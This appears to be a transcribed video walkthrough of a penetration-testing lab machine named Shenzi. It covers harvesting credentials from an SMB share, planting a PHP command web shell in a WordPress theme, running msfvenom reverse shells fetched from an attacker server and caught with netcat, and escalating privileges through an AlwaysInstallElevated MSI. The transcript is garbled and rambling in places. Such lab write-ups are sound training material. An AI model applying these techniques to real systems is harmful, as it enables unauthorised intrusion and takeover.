Hi everyone, welcome to my channel. We are going to exploit another Windows machine. The name is Shenzi. It's easy when you know the steps in order to perform the penetration test. Let me see you. We are at this directory with the name of the machine. We can enter inside of nmap. The target IP is the, let me review, is this one. Yes. So we can perform an common nmap scan on the one side, and in the other side during this process we can execute a fast TCP scan for all ports with 100 of threads, and there are many open ports. For example, the port 21 is the FTP, the IP, and 21 it's anonymous, maybe password required is anonymous domain at domain.com. It's a password incorrect, so maybe we can exit. So for example, the other port open is Samba. We can try to connect with Samba client with a let me put this one here. Yep, Samba client with a null session to this target IP, and it say that contain a Shenzi directory, so we can smb client // so this directory without password allow authentication, so we can obtain or review, for example, the more passwords.txt, and contain the common passwords for the directories. But let me see, this one is an important admin user required. So it seems that there are close all. There are WordPress installed inside of 192, 168, 187, 55. So it's a SAMP default installation with an HTTP server, MariaDB, PHP, and Perl. So it seems that there are a directory with name Shenzi. So this Shenzi redirect to you to WordPress web page that usually contain WP admin. This WP admin contain the WP login.php, and with user admin and the credentials that we review using the FTP, we can access. Don't save, remind me later, I only want to access. Yes. So at appearance, themes editor, we can edit a PHP file with our, for example, shell command line execution in order to process with a common system $get, and the parameter could be cmd. Looking nice for upload, and yes, so at this point we can access to this web page with 404.php, and it say can execute the system with the default value. So we can put a cmd parameter and who am I. This is the logged user at operative system. So we can review again. We can review, for example, who am I /all, the permission of the user logged. Yeah. What is the idea? The idea is upload a reverse shell, so we can execute a reverse shell with mfc venom. Yes, this one could be perfect. So clear. We want to execute this one with if config my target attacker IP. My attacker IP is the same. I'm not sure. And the local listen port could be the 18 port. So we are creating shell .exe value that we are going to share with Python at 80 port at local. The next command here could be a PowerShell HTTP to the attacker IP, and with the name shell exec. The out file could be shell exe2. So not seem that PowerShell HTTP / shell exe out file. Wow, because it's necessary use wget. This is the command. So / this one shell.exe, and out file is shell.exe. So the request arrive and ask about this command. So at this point we need review if is already downloaded the target server. With there we can review if shell .exe is here. Perfect, is here. So at this point we only need execute shell.exe, but we need listen at local with a netcat at port 80. Is perfect. Right now arrive a new shell. Who am I? This user. So pwd this don't work. Is cmd. No, this is a new web shell. So see users. So there is cd Shenzi. There it's cd desktop. There Perfect. Type local.txt. So at this point we can use a tool such as locate winps.exec for the privilege escalation recognition automatically at Windows. Here I need to go to scripts and cp this file at this folder. So I want to share it python 3 -m at port 4043. Yes. From this terminal, maybe I can split this one because I want that you follow. This is PowerShell. This is wget. The if config, the attacker IP is this one at it should be at 4043, and the name is winps.exe at out file is winps.exe. So the request not arrive at this port. Okay, so we can use the 21 port is perfect. PowerShell, wget, and HTTP at 192. I want to copy this one. Yes, and port 21 and winps.exe minus out file. Oh, the problem is out file, not the port. winps.exe. Unable to read data from the transport and existing connection for C closet remotely. Connection request. I'm not sure why, but we can try it again. Yep, force error. Oh shit. We need to relaunch this one. Yes, so this port, no, is dislike this port, so 4043 again. Here we can check this one, copy paste 4043, winps.exe minus out file winps.exe. So right now working fine using this port. We can execute the winps.exe. So after review all the content of the output, we can find that there are a common Windows privilege escalation at this machine that is always installed elevated. So this user is allowed to install a program with a privilege administrator. For this reason, we can exit this one, git, yeah, and exit, yeah, perfect. So we can create history a new payload with MSF Venom that contains the this one MSE installer software, and really is an executed a reversal, but in that case this reversal get or contain the permissions necessary to be administrator, because the user Shenzi run as this installer like administrator. So this is a permission specific on register user, always elevated, and is very common. So PowerShell wget http, this is the IP and port 4043, mse .exe, and here the out file is mse.exe, but this is at nmap directory, and this is a scripts directory. We need copy the shell.msc to I dislike yeah msc.msc, and out file is msc.msc. yeah, perfect. To scripts mse.mse. So right now, if we execute this operation, obtain the binary with MSE permission. So for the privilege escalation, there are MSE exec command during the terminal quiet qn and e of the mse.mse. At this point we need listen, for example here with netcat at the port 4043, because is the listen port that we specific at our payload. Don't work. Why don't work? What is this IP? This is MSE exec minus quiet minus qn minus e, and this is msc.msc. Why not? Don't work. So this is msc.msc here. Yes. Maybe we can go to the users and Shenzi, yeah, CD to the desktop, for example, and more clean. We can try to create again window reverse PHP this port, for example the port 21, and this is shell MSC. We are going to copy and paste again this payload. This is the installer. So at this point we can use again PowerShell wget HTTP at port for example 4043, and this is shell.msc. The out file is shell.msc. Here with Python 3 we can upload this one at port 4043 and obtain the reverse shell. Yes. Come on, come on, come on. Here I can start to listen for the port 21 at local from my attacker machine. So what happened here? Is working or not? So we need to relaunch the reverse shell again because it seems that it's not working. Yes, cdc and users and Shenzi, desktop, perfect. So PowerShell wget shellmsc out file shellmsc. We are going to use another name, for example move shell .msc to data.msc. So at this point we can execute PowerShell wget HTTP at this IP at 4043 at data.mse, and the output file should be data.mse. There are no listen port, so yeah, right now. It seems that this port don't work properly. Maybe we can use the 80 port because I don't know why this don't work properly. And yes, it's already in use. I know that it's already in use. Yes, this one. For example, 21. Okay, 21 could be possible at this port, this PowerShell, this one, this port 21, and data. So MSC. The out file is data.msc. Yeah. So if did not work, we can try to execute this one. Yes, it seems that it worked nice. So let me try 4043. um, 4043. Yes. So connection fortunately closed for remote machine. So add this directory should be a new data.mse. So, this one is mse dot mse, and this should be listen at what is the first one. This first one is a 4043. Yeah, so netcat minus n lvp at 4043. Don't arrive. This cell don't arrive. Okay. Venom local port. This is read desktop. Yeah. So history. Grep msf venom. History. Grep msf venom. So Windows self bind. Windows shell reverse TCP at an specific port. So what is MSE? So history MSF Venom. This one worked at the first time that I performed the machine. So 49 and 87. But we can use cat target and map grep open ports. We can try to use, for example, 4045 or 4045. Python 3 minus 4045 at this port. This is PowerShell, wget, http, what is my IP if config, this one. This is 4045 and the name is shell.mse. The out file is shell.mse. MSE. Yes, the petition is required. Mm, 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 mm. Mm, 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 mm. So I think that we need reboot the machine because it don't work as I expected. So we are going to close this one, close this one. Um, okay. Um, we have the cell MSE. This is move cell MSE to cell MSE at port cell 4043.mse. This one cell move um, cell dot exe to cell 80.exe. I think the machine is alive again. Ping minute C4 to the target machine. At this point, yes, is perfect, and we need start to listen with netcat at the port 18 because I won't obtain the reversal with name cell 80. Oh, I need to perform the access and oh shit. Yes, yes. So at this point, wp login.php follow could be, yeah, this is admin, and I don't remember the cat this one offensive security or this one offensive security, the name is this one, and nmap, this is a password txt, there are the credentials, and we can access, remind me later. Remind me later. Come on. Sorry. Okay. Yes. Change your made laws. Yes. Okay. Come on. Yes. This is appearance. Editor. 44. This could be system. This one is dollar get. This is the CMD. Yes, this is all. We close it. We can put this one here. Yes. So at this point we can do this one, cmd, no, this is 404.php, cmd. So who am I? Yes, perfect. Right now what can I do? I can upload the shell, PowerShell wget http, add the target machine if config. Yes, is this one. So here, and at port 80, this is shell 80 port dot xh, exec the out file could be shell dot exec. At the 18 port it's uploaded. But this is not that I looking for. I need to upload a Python server here and obtain the binary. Yeah, right now. So at this point I just wait for this execute shell dot exec that spawn me a reverse shell. Who am I? Perfect. Right now. Okay. Python. Let me review. Yes. This is Python 3 minus m at port 4043. I need execute this shell. So PowerShell wget http at the attacker IP at port this 4043, and I want the this is listen. Yeah, I want this shell. Yes. The out file going to be shell to root dot mse. Yes, perfect. The shell is listen at this port, is executed at this port. So mse exec minus quiet minus qn minus install the shell to root dot mse file. So let me copy this one. So shell it's better do this. Exec So msa exec dot exe, yeah, should be like this. So again, mhm, dot exe and shell to root. And it don't work. Why don't work? History pipe grep msf venom. I don't understand why don't work if it previously history grep msf venom, if it worked previously. Pipe grep mse, and in the both case maybe we can do this one. So here yes, we can do this one Python 3 at 4040 at 80 board, for example, and I can obtain PowerShell at 80 port, yeah, the MSE shell exe, this one. This file here and this file here. Shell.mse and shell.mse. So it required, perfect. So here I can start to listen at this port and close this one and invoke with this command to mse exec at this shell.mse. So who am I? Root and cd c users, try harder brother. And here and cd administrator, cd administrator and cd desktop. There, come on, type proof.txt, and this is all. Easy. The most difficult of this machine are the output ports of the Windows machine that are locked or closed by the firewall, or I'm not sure about the reason, but it seems that the communication is locked. With the netstat we can review the close wait, time wait, establish it. So there are commands for review the firewalls. Let me see. Windows cmd firewall rules, net sh add a firewall list yeah, AD firewall. ADD could be list. ADD rule list. List. No, there are no list. Consec dump. We can use dump or change context reset show. We can use show, for example, profile or global properties. Show all profile, show current profile, show global. Global display policy for and it's a firewall rules. No, I don't like this. Store display policy, store recurring interactive session. No, proprietary of public profile, display property, display global properties, display properties. But this is properties. I want to dump the configuration. Yeah, this is dump. Windows instead use net export command current policy. I dislike. So the firewall are profiles, display property for a profiles, so all profiles. Chain net firewall context, export dump consec change, monitor, import my mode, reset. Let me show all profiles. Profiles. Show all profiles. Profiles, all profiles, parameters, all profiles, so all profiles, parameters, state, firewall policy, display whether Windows Defender firewall with advanced security is true or firewall policy, display the firewall inbound and outbound. Yeah, firewall policy. So all profile firewall policy examples, firewall policy. Domain profile settings, firewall policy. Domain firewall policy OK, block inbound, block outbound, firewall policy profile settings, state. So all profiles state. So it's all profile state. Recognize internal state. Let me check this. All profile. So all profiles state. Domain setting staying on, profile setting staying on. Settings, firewall properties. I'm not sure at this moment, and this cell is not interactive. This is all. Okay. I review in another video. See you. um,